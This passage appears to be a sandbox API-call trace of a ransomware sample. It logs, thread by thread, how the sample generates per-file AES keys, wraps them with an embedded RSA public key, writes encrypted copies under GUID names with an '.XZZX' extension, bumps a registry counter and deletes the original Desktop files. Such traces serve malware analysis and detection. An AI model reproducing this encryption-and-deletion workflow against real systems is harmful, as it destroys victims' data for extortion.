f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0169.457] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0169.457] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a5360) returned 1 [0169.458] CryptImportPublicKeyInfo (in: hCryptProv=0x43a5360, dwCertEncodingType=0x1, pInfo=0x437fb18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437fb48*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437fb50*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372eb8) returned 1 [0169.458] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0169.458] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0169.458] CryptEncrypt (in: hKey=0x4372eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0169.458] CryptEncrypt (in: hKey=0x4372eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a53e8*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a53e8*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0169.458] WriteFile (in: hFile=0x9c4, lpBuffer=0x43a53e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a53e8*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0169.458] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0169.458] WriteFile (in: hFile=0x9c4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.458] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0169.458] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0169.459] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9cc) returned 0x0 [0169.459] RegQueryValueExW (in: hKey=0x9cc, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xfc, lpcbData=0x29adfdc*=0x4) returned 0x0 [0169.459] RegCloseKey (hKey=0x9cc) returned 0x0 [0169.459] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9cc) returned 0x0 [0169.459] RegSetValueExW (in: hKey=0x9cc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xfd, cbData=0x4 | out: lpData=0x29adfec*=0xfd) returned 0x0 [0169.459] RegCloseKey (hKey=0x9cc) returned 0x0 [0169.459] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.459] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.459] CloseHandle (hObject=0x9c4) returned 1 [0169.460] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0169.460] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0169.460] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\TxQmAhXtJ1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\txqmahxtj1.mp3")) returned 1 [0169.461] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\TxQmAhXtJ1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\txqmahxtj1.mp3")) returned 0 Thread: id = 578 os_tid = 0x68c [0169.485] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0169.485] lstrcpyW (in: lpString1=0x29af460, lpString2="ySq45fyDTuTLWzePdp4.m4a" | out: lpString1="ySq45fyDTuTLWzePdp4.m4a") returned="ySq45fyDTuTLWzePdp4.m4a" [0169.485] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0169.485] SetErrorMode (uMode=0x1) returned 0x1 [0169.485] lstrcpyW (in: lpString1=0x29af860, lpString2="ySq45fyDTuTLWzePdp4.m4a" | out: lpString1="ySq45fyDTuTLWzePdp4.m4a") returned="ySq45fyDTuTLWzePdp4.m4a" [0169.485] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x4031bd84, Data2=0x1c30, Data3=0x4ba5, Data4=([0]=0x89, [1]=0xd9, [2]=0xc5, [3]=0xd2, [4]=0x8d, [5]=0x1c, [6]=0x7b, [7]=0x23))) returned 0x0 [0169.485] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\ySq45fyDTuTLWzePdp4.m4a") returned 85 [0169.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0169.485] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\7A0DF8C008543AF04031BD840AEF1F38.XZZX") returned 99 [0169.485] StrStrW (lpFirst="ySq45fyDTuTLWzePdp4.m4a", lpSrch="XZZX") returned 0x0 [0169.485] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\ySq45fyDTuTLWzePdp4.m4a", dwFileAttributes=0x20) returned 1 [0169.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\ySq45fyDTuTLWzePdp4.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\ysq45fydtutlwzepdp4.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c8 [0169.486] ReadFile (in: hFile=0x9c8, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0x5a0d, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0x5a0d, lpOverlapped=0x0) returned 1 [0169.487] CloseHandle (hObject=0x9c8) returned 1 [0169.487] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0169.487] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0169.487] SetErrorMode (uMode=0x1) returned 0x1 [0169.487] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0169.487] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a5470) returned 1 [0169.489] CryptGenKey (in: hProv=0x43a5470, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372978) returned 1 [0169.591] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0169.591] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0169.591] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0169.591] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0169.591] CryptDestroyKey (hKey=0x4372978) returned 1 [0169.591] CryptReleaseContext (hProv=0x43a5470, dwFlags=0x0) returned 1 [0169.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\7A0DF8C008543AF04031BD840AEF1F38.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\7a0df8c008543af04031bd840aef1f38.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c8 [0169.592] WriteFile (in: hFile=0x9c8, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0x5a0d, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0x5a0d, lpOverlapped=0x0) returned 1 [0169.593] SetFilePointer (in: hFile=0x9c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5a0d [0169.593] WriteFile (in: hFile=0x9c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.593] SetFilePointer (in: hFile=0x9c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5a12 [0169.593] WriteFile (in: hFile=0x9c8, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x2e, lpOverlapped=0x0) returned 1 [0169.593] SetFilePointer (in: hFile=0x9c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5a40 [0169.593] WriteFile (in: hFile=0x9c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.593] SetFilePointer (in: hFile=0x9c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5a45 [0169.593] SetErrorMode (uMode=0x1) returned 0x1 [0169.593] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0169.593] OutputDebugStringW (lpOutputString="end") [0169.593] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0169.593] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0169.593] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a5470) returned 1 [0169.594] CryptImportPublicKeyInfo (in: hCryptProv=0x43a5470, dwCertEncodingType=0x1, pInfo=0x437fbe8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437fc18*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437fc20*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x3a54d0) returned 1 [0169.594] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0169.594] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0169.594] CryptEncrypt (in: hKey=0x3a54d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0169.594] CryptEncrypt (in: hKey=0x3a54d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a54f8*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a54f8*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0169.595] WriteFile (in: hFile=0x9c8, lpBuffer=0x43a54f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a54f8*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0169.595] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0169.595] WriteFile (in: hFile=0x9c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.595] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0169.595] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0169.595] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9d0) returned 0x0 [0169.595] RegQueryValueExW (in: hKey=0x9d0, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xfd, lpcbData=0x29adfdc*=0x4) returned 0x0 [0169.595] RegCloseKey (hKey=0x9d0) returned 0x0 [0169.595] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9d0) returned 0x0 [0169.595] RegSetValueExW (in: hKey=0x9d0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xfe, cbData=0x4 | out: lpData=0x29adfec*=0xfe) returned 0x0 [0169.595] RegCloseKey (hKey=0x9d0) returned 0x0 [0169.595] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.596] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.596] CloseHandle (hObject=0x9c8) returned 1 [0169.596] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0169.597] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0169.597] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\ySq45fyDTuTLWzePdp4.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\ysq45fydtutlwzepdp4.m4a")) returned 1 [0169.598] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\ySq45fyDTuTLWzePdp4.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\ysq45fydtutlwzepdp4.m4a")) returned 0 Thread: id = 579 os_tid = 0x3bc [0169.645] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0169.645] lstrcpyW (in: lpString1=0x29af460, lpString2="5OmbcR7YDw3.bmp" | out: lpString1="5OmbcR7YDw3.bmp") returned="5OmbcR7YDw3.bmp" [0169.645] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0169.645] SetErrorMode (uMode=0x1) returned 0x1 [0169.645] lstrcpyW (in: lpString1=0x29af860, lpString2="5OmbcR7YDw3.bmp" | out: lpString1="5OmbcR7YDw3.bmp") returned="5OmbcR7YDw3.bmp" [0169.645] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x8a734512, Data2=0x3ac8, Data3=0x4a7d, Data4=([0]=0x9f, [1]=0xd8, [2]=0xaa, [3]=0x72, [4]=0xe0, [5]=0x94, [6]=0xfe, [7]=0xc7))) returned 0x0 [0169.645] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\5OmbcR7YDw3.bmp") returned 77 [0169.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0169.645] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\47B40A10111A83A88A73451213B567F0.XZZX") returned 99 [0169.645] StrStrW (lpFirst="5OmbcR7YDw3.bmp", lpSrch="XZZX") returned 0x0 [0169.645] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\5OmbcR7YDw3.bmp", dwFileAttributes=0x20) returned 1 [0169.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\5OmbcR7YDw3.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\5ombcr7ydw3.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9d0 [0169.646] ReadFile (in: hFile=0x9d0, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0xce86, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0xce86, lpOverlapped=0x0) returned 1 [0169.647] CloseHandle (hObject=0x9d0) returned 1 [0169.647] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0169.647] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0169.647] SetErrorMode (uMode=0x1) returned 0x1 [0169.647] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0169.647] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a5580) returned 1 [0169.649] CryptGenKey (in: hProv=0x43a5580, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372978) returned 1 [0169.734] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0169.734] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0169.734] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0169.735] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0169.735] CryptDestroyKey (hKey=0x4372978) returned 1 [0169.735] CryptReleaseContext (hProv=0x43a5580, dwFlags=0x0) returned 1 [0169.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\47B40A10111A83A88A73451213B567F0.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kz7l4kmppgbeetv_wvf\\47b40a10111a83a88a73451213b567f0.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9d0 [0169.736] WriteFile (in: hFile=0x9d0, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0xce86, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0xce86, lpOverlapped=0x0) returned 1 [0169.737] SetFilePointer (in: hFile=0x9d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xce86 [0169.737] WriteFile (in: hFile=0x9d0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.737] SetFilePointer (in: hFile=0x9d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xce8b [0169.737] WriteFile (in: hFile=0x9d0, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x1e, 